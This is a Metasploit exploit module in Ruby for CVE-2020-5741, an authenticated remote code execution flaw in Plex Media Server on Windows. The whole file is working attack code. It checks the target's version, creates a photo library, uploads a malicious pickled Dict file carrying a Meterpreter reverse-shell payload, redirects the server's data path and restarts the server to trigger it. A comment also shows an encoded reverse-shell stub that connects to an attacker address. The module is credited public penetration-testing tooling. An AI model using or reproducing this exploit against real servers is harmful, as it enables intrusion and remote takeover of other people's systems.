`## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'Plex Unpickle Dict Windows RCE', 'Description' => %q{ This module exploits an authenticated Python unsafe pickle.load of a Dict file. An authenticated attacker can create a photo library and add arbitrary files to it. After setting the Windows only Plex variable LocalAppDataPath to the newly created photo library, a file named Dict will be unpickled, which causes an RCE as the user who started Plex. Plex_Token is required, to get it you need to log-in through a web browser, then check the requests to grab the X-Plex-Token header. See info -d for additional details. If an exploit fails, or is cancelled, Dict is left on disk, a new ALBUM_NAME will be required as subsuquent writes will make Dict-1, and not execute. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Chris Lyne' # discovery, POC ], 'References' => [ ['URL', 'https://github.com/tenable/poc/blob/master/plex/plex_media_server/auth_dict_unpickle_rce_exploit_tra_2020_32.py'], ['URL', 'https://www.tenable.com/security/research/tra-2020-32'], ['URL', 'http://support.plex.tv/articles/201105343-advanced-hidden-server-settings/'], ['URL', 'https://forums.plex.tv/t/security-regarding-cve-2020-5741/586819'], ['CVE', '2020-5741'] ], 'Platform' => ['python'], 'Privileged' => false, 'Arch' => [ARCH_PYTHON], 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }, 'Notes' => { 'Stability' => [CRASH_SERVICE_RESTARTS], # we reboot the server twice 'Reliability' => [REPEATABLE_SESSION, CONFIG_CHANGES], # we attempt to revert config changes 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] }, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => 'May 7 2020', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(32400), OptString.new('PLEX_TOKEN', [true, 'Admin Authenticated X-Plex-Token', '']), OptString.new('LIBRARY_PATH', [true, 'Path to write picture library to', 'C:\\Users\\Public']), OptString.new('ALBUM_NAME', [true, 'Name of Album', '']), OptInt.new('REBOOT_SLEEP', [true, 'Time to wait for Plex to restart', 15]) ] ) end def album_name if @album_name.nil? @album_name = datastore['ALBUM_NAME'].blank? ? rand_text_alphanumeric(6) : datastore['ALBUM_NAME'] end @album_name end def create_photo_library print_status('Adding new photo library') res = send_request_cgi( 'method' => 'POST', 'uri' => '/library/sections', 'headers' => { 'X-Plex-Token' => datastore['PLEX_TOKEN'], 'Accept' => 'application/json' }, 'vars_get' => { 'name' => album_name, 'language' => 'en', 'agent' => 'com.plexapp.agents.none', 'location' => datastore['LIBRARY_PATH'], 'type' => 'photo', 'scanner' => 'Plex Photo Scanner' } ) # response: # {"MediaContainer":{"size":1,"Directory":[{"art":"/:/resources/photo-fanart.jpg","composite":"/library/sections/-1/composite/1592441414","thumb":"/:/resources/photo.png","key":"7","type":"photo","title":"EvilLib2","agent":"com.plexapp.agents.none","scanner":"Plex Photo Scanner","language":"en","uuid":"95d3810f-8be0-497c-b6d4-170050f7ab30","updatedAt":1592441414,"createdAt":1592441414,"enableAutoPhotoTags":false,"content":true,"directory":true,"contentChangedAt":5135637678740750690,"Location":[{"id":7,"path":"C:\\Users\\Public"}]}]}} # we need to pull ['MediaContainer']['Directory'][0]['key'] if res && res.code == 201 # 201 == Created return res.get_json_document['MediaContainer']['Directory'][0]['key'] end nil end def add_pickle(location) print_status('Adding pickled Dict to library') # This is the pickle code, generated on windows to ensure no cross platform # issues were encountered ####### # python (2.7 ships with Plex) ####### # import pickle # # class EP(object): # def __init__(self): # pass # def __reduce__(self): # # for generating an approximately correct size and content, we use # # msfvenom -p python/meterpreter/reverse_tcp LPORT=9999 LHOST=192.168.0.1 # # that payload is then added after runsource. # # The original pre-meterp return would be # # return (eval, ("__import__('code').InteractiveInterpreter().runsource(, '', 'exec')",)) # return (eval, ("__import__('code').InteractiveInterpreter().runsource(\"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4xJyw5OTk5KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')[0]))\", '', 'exec')",)) # # e = EP() # pickle.dumps(e) # The output from that command will look similar to the following: # 'c__builtin__\neval\np0\n(S\'__import__(\\\'code\\\').InteractiveInterpreter().runsource("exec(__import__(\\\'base64\\\').b64decode(__import__(\\\'codecs\\\').getencoder(\\\'utf-8\\\')(\\\'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4xJyw5OTk5KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==\\\')[0]))", \\\'\\\', \\\'exec\\\')\'\np1\ntp2\nRp3\n.' p = %|c__builtin__\neval\np0\n(S\'| p << %|__import__('code').InteractiveInterpreter().runsource("#{payload.encoded}", '', 'exec')|.gsub("'", "\\\\'") p << %(\'\np1\ntp2\nRp3\n.) # rubocop changed the | to ( which to not match the last 2 lines... filename = "#{album_name}/Plex Media Server/Plug-in Support/Data/com.plexapp.system/" u = "type=13§ionID=3&locationID=#{location}&createdAt=1171387901&filename=#{URI.encode_www_form_component(filename)}" # using raw here because the encodings for the filename got really wacky when using CGI res = send_request_raw( 'method' => 'POST', 'uri' => "/library/metadata?#{u}Dict", 'headers' => { 'X-Plex-Token' => datastore['PLEX_TOKEN'] }, 'ctype' => 'application/octet-stream', 'data' => p ) if res && res.code == 401 fail_with(Failure::UnexpectedReply, 'Permission denied when attempting to upload file. Plex server may not be registered to an account or you lack permission.') delete_photo_library(location) return false end # Deleting the file (even with a PrependFork) tended to kill the session or make it unreliable # register_file_for_cleanup("#{datastore['LIBRARY_PATH']}\\#{filename.gsub('/', '\\\\')}Dict") if res && res.code == 401 fail_with(Failure::UnexpectedReply, 'Permission denied when attempting to upload file. Plex server may not be registered to an account or you lack permission.') delete_photo_library(location) return false end true end def change_apppath(path) print_status('Changing AppPath') send_request_cgi( 'method' => 'PUT', 'uri' => '/:/prefs', 'vars_get' => { 'X-Plex-Token' => datastore['PLEX_TOKEN'], 'LocalAppDataPath' => path } ) end def restart_plex print_status('Restarting Plex') send_request_cgi( 'method' => 'GET', 'uri' => '/:/plugins/com.plexapp.system/restart', 'vars_get' => { 'X-Plex-Token' => datastore['PLEX_TOKEN'] } ) end def delete_photo_library(library) print_status('Deleting Photo Library') send_request_cgi( 'method' => 'DELETE', 'uri' => "/library/sections/#{library}", 'vars_get' => { 'X-Plex-Token' => datastore['PLEX_TOKEN'] } ) end def ret_server_info print_status('Gathering Plex Config') res = send_request_cgi( 'uri' => '/', 'headers' => { 'X-Plex-Token' => datastore['PLEX_TOKEN'] } ) unless res && res.code == 200 return nil end return Hash.from_xml(res.body) end def check server = ret_server_info if server.nil? return CheckCode::Safe('Could not connect to the web service, check URI Path and IP') end store_loot('plex.json', 'application/json', datastore['RHOST'], server.to_s, 'plex.json', 'Plex Server Configuration') report_host({ host: datastore['RHOST'], os_name: server['MediaContainer']['platform'], os_flavor: server['MediaContainer']['platformVersion'] }) print_status("Server Name: #{server['MediaContainer']['friendlyName']}") unless server['MediaContainer']['platform'] == 'Windows' print_bad("Server OS: #{server['MediaContainer']['platform']} (#{server['MediaContainer']['platformVersion']})") return CheckCode::Safe('Only Windows OS is exploitable') end print_good("Server OS: #{server['MediaContainer']['platform']} (#{server['MediaContainer']['platformVersion']})") v = Gem::Version.new(server['MediaContainer']['version']) if v >= Gem::Version.new('1.19.3') print_bad("Server Version: #{v}") return CheckCode::Safe('Only < 1.19.3 is exploitable') end print_good("Server Version: #{server['MediaContainer']['version']}") unless server['MediaContainer']['allowCameraUpload'] print_bad("Camera Upload: #{server['MediaContainer']['allowCameraUpload']}") return CheckCode::Safe('Camera Upload not enabled') end print_good("Camera Upload: #{server['MediaContainer']['allowCameraUpload']}") CheckCode::Vulnerable end def exploit if datastore['PLEX_TOKEN'].blank? fail_with(Failure::BadConfig, 'PLEX_TOKEN is required.') end unless check == CheckCode::Vulnerable fail_with(Failure::NotVulnerable, 'Server not vulnerable') end print_status("Using album name: #{album_name}") id = create_photo_library if id.nil? fail_with(Failure::UnexpectedReply, 'Unable to create photo library, possible permission problem') end print_good("Created Photo Library: #{id}") success = add_pickle(id) unless success fail_with(Failure::UnexpectedReply, 'Unable to upload files to library') end change_apppath("#{datastore['LIBRARY_PATH']}\\#{album_name}") restart_plex print_status("Sleeping #{datastore['REBOOT_SLEEP']} seconds for server restart") Rex.sleep(datastore['REBOOT_SLEEP']) print_status('Cleanup Phase: Reverting changes from exploitation') change_apppath('') restart_plex delete_photo_library(id) end end `